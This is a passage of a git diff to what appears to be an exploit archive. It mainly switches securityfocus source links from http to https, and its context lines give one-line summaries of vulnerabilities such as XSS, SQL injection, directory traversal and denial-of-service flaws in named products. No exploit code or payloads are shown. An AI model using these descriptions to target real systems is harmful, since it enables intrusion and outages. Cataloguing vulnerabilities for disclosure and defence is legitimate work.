a/exploits/asp/webapps/35728.txt b/exploits/asp/webapps/35728.txt index fd0b3da3f..3f6b0247b 100644 --- a/exploits/asp/webapps/35728.txt +++ b/exploits/asp/webapps/35728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47772/info +source: https://www.securityfocus.com/bid/47772/info Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35758.txt b/exploits/asp/webapps/35758.txt index 895acfdd3..d25609e4f 100644 --- a/exploits/asp/webapps/35758.txt +++ b/exploits/asp/webapps/35758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47874/info +source: https://www.securityfocus.com/bid/47874/info Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35807.txt b/exploits/asp/webapps/35807.txt index cceab5be1..98fede60c 100644 --- a/exploits/asp/webapps/35807.txt +++ b/exploits/asp/webapps/35807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48051/info +source: https://www.securityfocus.com/bid/48051/info Kentico CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35852.txt b/exploits/asp/webapps/35852.txt index 4b082c851..f4c5f5881 100644 --- a/exploits/asp/webapps/35852.txt +++ b/exploits/asp/webapps/35852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48235/info +source: https://www.securityfocus.com/bid/48235/info Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35872.txt b/exploits/asp/webapps/35872.txt index fadae23a7..e2c11dcb8 100644 --- a/exploits/asp/webapps/35872.txt +++ b/exploits/asp/webapps/35872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48384/info +source: https://www.securityfocus.com/bid/48384/info The H3C ER5100 is prone to a remote authentication-bypass vulnerability. diff --git a/exploits/asp/webapps/35923.txt b/exploits/asp/webapps/35923.txt index d616bac58..01d57bbb2 100644 --- a/exploits/asp/webapps/35923.txt +++ b/exploits/asp/webapps/35923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48559/info +source: https://www.securityfocus.com/bid/48559/info Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35926.txt b/exploits/asp/webapps/35926.txt index 0bd5fa348..2e4e10c7c 100644 --- a/exploits/asp/webapps/35926.txt +++ b/exploits/asp/webapps/35926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48561/info +source: https://www.securityfocus.com/bid/48561/info eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/36001.txt b/exploits/asp/webapps/36001.txt index e30e4964b..4e50bedcf 100644 --- a/exploits/asp/webapps/36001.txt +++ b/exploits/asp/webapps/36001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48930/info +source: https://www.securityfocus.com/bid/48930/info Sitecore CMS is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36010.txt b/exploits/asp/webapps/36010.txt index 4750de8fe..a34fddf9c 100644 --- a/exploits/asp/webapps/36010.txt +++ b/exploits/asp/webapps/36010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48969/info +source: https://www.securityfocus.com/bid/48969/info BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36011.txt b/exploits/asp/webapps/36011.txt index 845bd25b1..c0ad8705d 100644 --- a/exploits/asp/webapps/36011.txt +++ b/exploits/asp/webapps/36011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48970/info +source: https://www.securityfocus.com/bid/48970/info Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36019.txt b/exploits/asp/webapps/36019.txt index 07c29052d..18bdd2f3a 100644 --- a/exploits/asp/webapps/36019.txt +++ b/exploits/asp/webapps/36019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49022/info +source: https://www.securityfocus.com/bid/49022/info Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36063.txt b/exploits/asp/webapps/36063.txt index 6ee8923ee..c2770128e 100644 --- a/exploits/asp/webapps/36063.txt +++ b/exploits/asp/webapps/36063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49207/info +source: https://www.securityfocus.com/bid/49207/info Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36064.txt b/exploits/asp/webapps/36064.txt index 6945f29d1..2dccc0315 100644 --- a/exploits/asp/webapps/36064.txt +++ b/exploits/asp/webapps/36064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49208/info +source: https://www.securityfocus.com/bid/49208/info Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36065.txt b/exploits/asp/webapps/36065.txt index c8a716f9f..08684d293 100644 --- a/exploits/asp/webapps/36065.txt +++ b/exploits/asp/webapps/36065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49209/info +source: https://www.securityfocus.com/bid/49209/info Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36066.txt b/exploits/asp/webapps/36066.txt index 0064a9c3a..d551f519e 100644 --- a/exploits/asp/webapps/36066.txt +++ b/exploits/asp/webapps/36066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49210/info +source: https://www.securityfocus.com/bid/49210/info Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36116.txt b/exploits/asp/webapps/36116.txt index 8d78c73b9..b08454409 100644 --- a/exploits/asp/webapps/36116.txt +++ b/exploits/asp/webapps/36116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49468/info +source: https://www.securityfocus.com/bid/49468/info Kisanji is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36133.txt b/exploits/asp/webapps/36133.txt index a8519add5..137421929 100644 --- a/exploits/asp/webapps/36133.txt +++ b/exploits/asp/webapps/36133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49614/info +source: https://www.securityfocus.com/bid/49614/info Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36134.txt b/exploits/asp/webapps/36134.txt index 5d5395aa2..fb1eb5525 100644 --- a/exploits/asp/webapps/36134.txt +++ b/exploits/asp/webapps/36134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49620/info +source: https://www.securityfocus.com/bid/49620/info Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36138.txt b/exploits/asp/webapps/36138.txt index e834c12f9..03a06ab4f 100644 --- a/exploits/asp/webapps/36138.txt +++ b/exploits/asp/webapps/36138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49667/info +source: https://www.securityfocus.com/bid/49667/info ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/36139.txt b/exploits/asp/webapps/36139.txt index 63009085b..e0d7dab9a 100644 --- a/exploits/asp/webapps/36139.txt +++ b/exploits/asp/webapps/36139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49668/info +source: https://www.securityfocus.com/bid/49668/info Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36141.txt b/exploits/asp/webapps/36141.txt index a2d9c3455..69b840585 100644 --- a/exploits/asp/webapps/36141.txt +++ b/exploits/asp/webapps/36141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49674/info +source: https://www.securityfocus.com/bid/49674/info Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36146.txt b/exploits/asp/webapps/36146.txt index 04f15ce23..9ec131ecd 100644 --- a/exploits/asp/webapps/36146.txt +++ b/exploits/asp/webapps/36146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49712/info +source: https://www.securityfocus.com/bid/49712/info i-Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36284.txt b/exploits/asp/webapps/36284.txt index 0591fc4a5..285c7aef0 100644 --- a/exploits/asp/webapps/36284.txt +++ b/exploits/asp/webapps/36284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50512/info +source: https://www.securityfocus.com/bid/50512/info CmyDocument is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36375.txt b/exploits/asp/webapps/36375.txt index 3a6a8d987..579e261c8 100644 --- a/exploits/asp/webapps/36375.txt +++ b/exploits/asp/webapps/36375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50841/info +source: https://www.securityfocus.com/bid/50841/info Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface. diff --git a/exploits/asp/webapps/36402.txt b/exploits/asp/webapps/36402.txt index ad493b0c1..6b9f9a0b5 100644 --- a/exploits/asp/webapps/36402.txt +++ b/exploits/asp/webapps/36402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50878/info +source: https://www.securityfocus.com/bid/50878/info Hero is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36515.txt b/exploits/asp/webapps/36515.txt index e5b4ba0c7..89f98a485 100644 --- a/exploits/asp/webapps/36515.txt +++ b/exploits/asp/webapps/36515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51316/info +source: https://www.securityfocus.com/bid/51316/info DIGIT CMS is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/36547.txt b/exploits/asp/webapps/36547.txt index 72e89021e..b4dc40089 100644 --- a/exploits/asp/webapps/36547.txt +++ b/exploits/asp/webapps/36547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51401/info +source: https://www.securityfocus.com/bid/51401/info MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36585.txt b/exploits/asp/webapps/36585.txt index 26f556703..1f3895ceb 100644 --- a/exploits/asp/webapps/36585.txt +++ b/exploits/asp/webapps/36585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51596/info +source: https://www.securityfocus.com/bid/51596/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36588.txt b/exploits/asp/webapps/36588.txt index c07ee3cdd..1141e1170 100644 --- a/exploits/asp/webapps/36588.txt +++ b/exploits/asp/webapps/36588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51608/info +source: https://www.securityfocus.com/bid/51608/info Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/36599.txt b/exploits/asp/webapps/36599.txt index 24c87c406..809e4771a 100644 --- a/exploits/asp/webapps/36599.txt +++ b/exploits/asp/webapps/36599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51631/info +source: https://www.securityfocus.com/bid/51631/info Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/36934.txt b/exploits/asp/webapps/36934.txt index 31ba2c260..7166ecc62 100644 --- a/exploits/asp/webapps/36934.txt +++ b/exploits/asp/webapps/36934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36935.txt b/exploits/asp/webapps/36935.txt index cdccb6f1f..35ebb0655 100644 --- a/exploits/asp/webapps/36935.txt +++ b/exploits/asp/webapps/36935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36936.txt b/exploits/asp/webapps/36936.txt index cf4a9efe6..0bef3d3bc 100644 --- a/exploits/asp/webapps/36936.txt +++ b/exploits/asp/webapps/36936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/37015.txt b/exploits/asp/webapps/37015.txt index 9de3e607b..8e86b1661 100644 --- a/exploits/asp/webapps/37015.txt +++ b/exploits/asp/webapps/37015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52730/info +source: https://www.securityfocus.com/bid/52730/info Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/37119.txt b/exploits/asp/webapps/37119.txt index 5a3af27aa..ee82bb086 100644 --- a/exploits/asp/webapps/37119.txt +++ b/exploits/asp/webapps/37119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53292/info +source: https://www.securityfocus.com/bid/53292/info XM Forum is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37121.txt b/exploits/asp/webapps/37121.txt index 46d87051d..aea61177a 100644 --- a/exploits/asp/webapps/37121.txt +++ b/exploits/asp/webapps/37121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53298/info +source: https://www.securityfocus.com/bid/53298/info BBSXP CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37222.txt b/exploits/asp/webapps/37222.txt index 867d9df9d..15510f253 100644 --- a/exploits/asp/webapps/37222.txt +++ b/exploits/asp/webapps/37222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53616/info +source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. diff --git a/exploits/asp/webapps/37223.txt b/exploits/asp/webapps/37223.txt index 48f0326ba..95c6b7ace 100644 --- a/exploits/asp/webapps/37223.txt +++ b/exploits/asp/webapps/37223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53616/info +source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. diff --git a/exploits/asp/webapps/37488.txt b/exploits/asp/webapps/37488.txt index 00580964d..772967292 100644 --- a/exploits/asp/webapps/37488.txt +++ b/exploits/asp/webapps/37488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54346/info +source: https://www.securityfocus.com/bid/54346/info WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37577.txt b/exploits/asp/webapps/37577.txt index 6a8734b9e..e81539d11 100644 --- a/exploits/asp/webapps/37577.txt +++ b/exploits/asp/webapps/37577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54817/info +source: https://www.securityfocus.com/bid/54817/info PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37676.txt b/exploits/asp/webapps/37676.txt index e6af02310..67a116b9e 100644 --- a/exploits/asp/webapps/37676.txt +++ b/exploits/asp/webapps/37676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55216/info +source: https://www.securityfocus.com/bid/55216/info Power-eCommerce is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37678.txt b/exploits/asp/webapps/37678.txt index 36816884d..54907381d 100644 --- a/exploits/asp/webapps/37678.txt +++ b/exploits/asp/webapps/37678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55220/info +source: https://www.securityfocus.com/bid/55220/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37689.txt b/exploits/asp/webapps/37689.txt index bc8d400ff..e9a15ea97 100644 --- a/exploits/asp/webapps/37689.txt +++ b/exploits/asp/webapps/37689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55299/info +source: https://www.securityfocus.com/bid/55299/info XM Forum is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37696.txt b/exploits/asp/webapps/37696.txt index b4738ce1e..1945b877c 100644 --- a/exploits/asp/webapps/37696.txt +++ b/exploits/asp/webapps/37696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55395/info +source: https://www.securityfocus.com/bid/55395/info Cm3 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37995.txt b/exploits/asp/webapps/37995.txt index 242799b53..bc6c853a1 100644 --- a/exploits/asp/webapps/37995.txt +++ b/exploits/asp/webapps/37995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56342/info +source: https://www.securityfocus.com/bid/56342/info SolarWinds Orion IP Address Manager (IPAM) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38318.txt b/exploits/asp/webapps/38318.txt index 7605bceaf..da3f8fc9e 100644 --- a/exploits/asp/webapps/38318.txt +++ b/exploits/asp/webapps/38318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58012/info +source: https://www.securityfocus.com/bid/58012/info MIMEsweeper for SMTP is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/38415.txt b/exploits/asp/webapps/38415.txt index b5d3592f9..dad98a411 100644 --- a/exploits/asp/webapps/38415.txt +++ b/exploits/asp/webapps/38415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58838/info +source: https://www.securityfocus.com/bid/58838/info C2 WebResource is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38479.txt b/exploits/asp/webapps/38479.txt index e7f989b7c..e8d7e4d0a 100644 --- a/exploits/asp/webapps/38479.txt +++ b/exploits/asp/webapps/38479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59290/info +source: https://www.securityfocus.com/bid/59290/info Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38653.txt b/exploits/asp/webapps/38653.txt index 7d03b3e64..5a826d88d 100644 --- a/exploits/asp/webapps/38653.txt +++ b/exploits/asp/webapps/38653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61152/info +source: https://www.securityfocus.com/bid/61152/info Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38655.txt b/exploits/asp/webapps/38655.txt index 25d13bd55..83a05f36f 100644 --- a/exploits/asp/webapps/38655.txt +++ b/exploits/asp/webapps/38655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61156/info +source: https://www.securityfocus.com/bid/61156/info Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38696.txt b/exploits/asp/webapps/38696.txt index b7c7925fb..9a65705a9 100644 --- a/exploits/asp/webapps/38696.txt +++ b/exploits/asp/webapps/38696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61770/info +source: https://www.securityfocus.com/bid/61770/info DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38749.txt b/exploits/asp/webapps/38749.txt index c807b7a93..eef782897 100644 --- a/exploits/asp/webapps/38749.txt +++ b/exploits/asp/webapps/38749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62186/info +source: https://www.securityfocus.com/bid/62186/info Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/38879.txt b/exploits/asp/webapps/38879.txt index 32c0fab27..8dfc471ee 100644 --- a/exploits/asp/webapps/38879.txt +++ b/exploits/asp/webapps/38879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64332/info +source: https://www.securityfocus.com/bid/64332/info B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/38883.txt b/exploits/asp/webapps/38883.txt index 638754b37..ce542e3f2 100644 --- a/exploits/asp/webapps/38883.txt +++ b/exploits/asp/webapps/38883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64371/info +source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/38884.txt b/exploits/asp/webapps/38884.txt index f5eec3c47..6889a27b0 100644 --- a/exploits/asp/webapps/38884.txt +++ b/exploits/asp/webapps/38884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64371/info +source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/38935.txt b/exploits/asp/webapps/38935.txt index 5141bbdfe..76bdeacc2 100644 --- a/exploits/asp/webapps/38935.txt +++ b/exploits/asp/webapps/38935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64572/info +source: https://www.securityfocus.com/bid/64572/info CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/39106.txt b/exploits/asp/webapps/39106.txt index a1b4f380f..1548145cc 100644 --- a/exploits/asp/webapps/39106.txt +++ b/exploits/asp/webapps/39106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65740/info +source: https://www.securityfocus.com/bid/65740/info eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/asp/webapps/39187.txt b/exploits/asp/webapps/39187.txt index 001579cab..0750749ce 100644 --- a/exploits/asp/webapps/39187.txt +++ b/exploits/asp/webapps/39187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67442/info +source: https://www.securityfocus.com/bid/67442/info CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/atheos/local/21282.c b/exploits/atheos/local/21282.c index 57e0305cb..01cef9f95 100644 --- a/exploits/atheos/local/21282.c +++ b/exploits/atheos/local/21282.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4051/info +source: https://www.securityfocus.com/bid/4051/info AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project. diff --git a/exploits/beos/dos/19938.txt b/exploits/beos/dos/19938.txt index de6b7590a..cd937ec6c 100644 --- a/exploits/beos/dos/19938.txt +++ b/exploits/beos/dos/19938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1222/info +source: https://www.securityfocus.com/bid/1222/info BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot. diff --git a/exploits/beos/local/19840.txt b/exploits/beos/local/19840.txt index 669feaade..ceed515c8 100644 --- a/exploits/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1098/info +source: https://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. diff --git a/exploits/beos/local/19841.casl b/exploits/beos/local/19841.casl index f178e4fc5..7c3367eb3 100644 --- a/exploits/beos/local/19841.casl +++ b/exploits/beos/local/19841.casl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1100/info +source: https://www.securityfocus.com/bid/1100/info The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28. diff --git a/exploits/beos/remote/20404.txt b/exploits/beos/remote/20404.txt index 95625e9d9..36a7da127 100644 --- a/exploits/beos/remote/20404.txt +++ b/exploits/beos/remote/20404.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1944/info +source : https://www.securityfocus.com/bid/1944/info RobinHood is a HTTP/1.1 web server based upon libHTTP and is designed for the BeOS platform. diff --git a/exploits/bsd/dos/16064.c b/exploits/bsd/dos/16064.c index 85a2118e3..89a80e64f 100644 --- a/exploits/bsd/dos/16064.c +++ b/exploits/bsd/dos/16064.c @@ -1,3 +1,4 @@ +/* # Exploit Title: FreeBSD local denial of service - forced reboot # Date: 28. January 2011 # Author: Kingcope @@ -7,6 +8,8 @@ This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference. +*/ + #include #include diff --git a/exploits/bsd/dos/19117.c b/exploits/bsd/dos/19117.c index c82bae737..5a760c61c 100644 --- a/exploits/bsd/dos/19117.c +++ b/exploits/bsd/dos/19117.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/147/info +source: https://www.securityfocus.com/bid/147/info The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss. */ diff --git a/exploits/bsd/dos/19423.c b/exploits/bsd/dos/19423.c index 0834d1b04..9dd3fbf19 100644 --- a/exploits/bsd/dos/19423.c +++ b/exploits/bsd/dos/19423.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/526/info +source: https://www.securityfocus.com/bid/526/info Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running. */ diff --git a/exploits/bsd/dos/19488.c b/exploits/bsd/dos/19488.c index 968eb9632..841ab8663 100644 --- a/exploits/bsd/dos/19488.c +++ b/exploits/bsd/dos/19488.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/622/info +// source: https://www.securityfocus.com/bid/622/info A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. diff --git a/exploits/bsd/dos/19564.c b/exploits/bsd/dos/19564.c index 5d4062181..42724f5ed 100644 --- a/exploits/bsd/dos/19564.c +++ b/exploits/bsd/dos/19564.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/736/info +// source: https://www.securityfocus.com/bid/736/info It is possible to remotely lock Axent Raptor firewalls by sending them packets with malformed IP options fields. According to an advisory posted to bugtraq by the perdue CERIAS labs, setting the SECURITY and TIMESTAMP IP options length to 0 can cause an infinite loop to occur within the code that handles the options (resulting in the software freezing). A consequence of this is a remote denial of service. diff --git a/exploits/bsd/dos/19896.c b/exploits/bsd/dos/19896.c index 7ae39a00c..c3357cffe 100644 --- a/exploits/bsd/dos/19896.c +++ b/exploits/bsd/dos/19896.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1173/info +// source: https://www.securityfocus.com/bid/1173/info A vulnerability exists in the 1.4.x 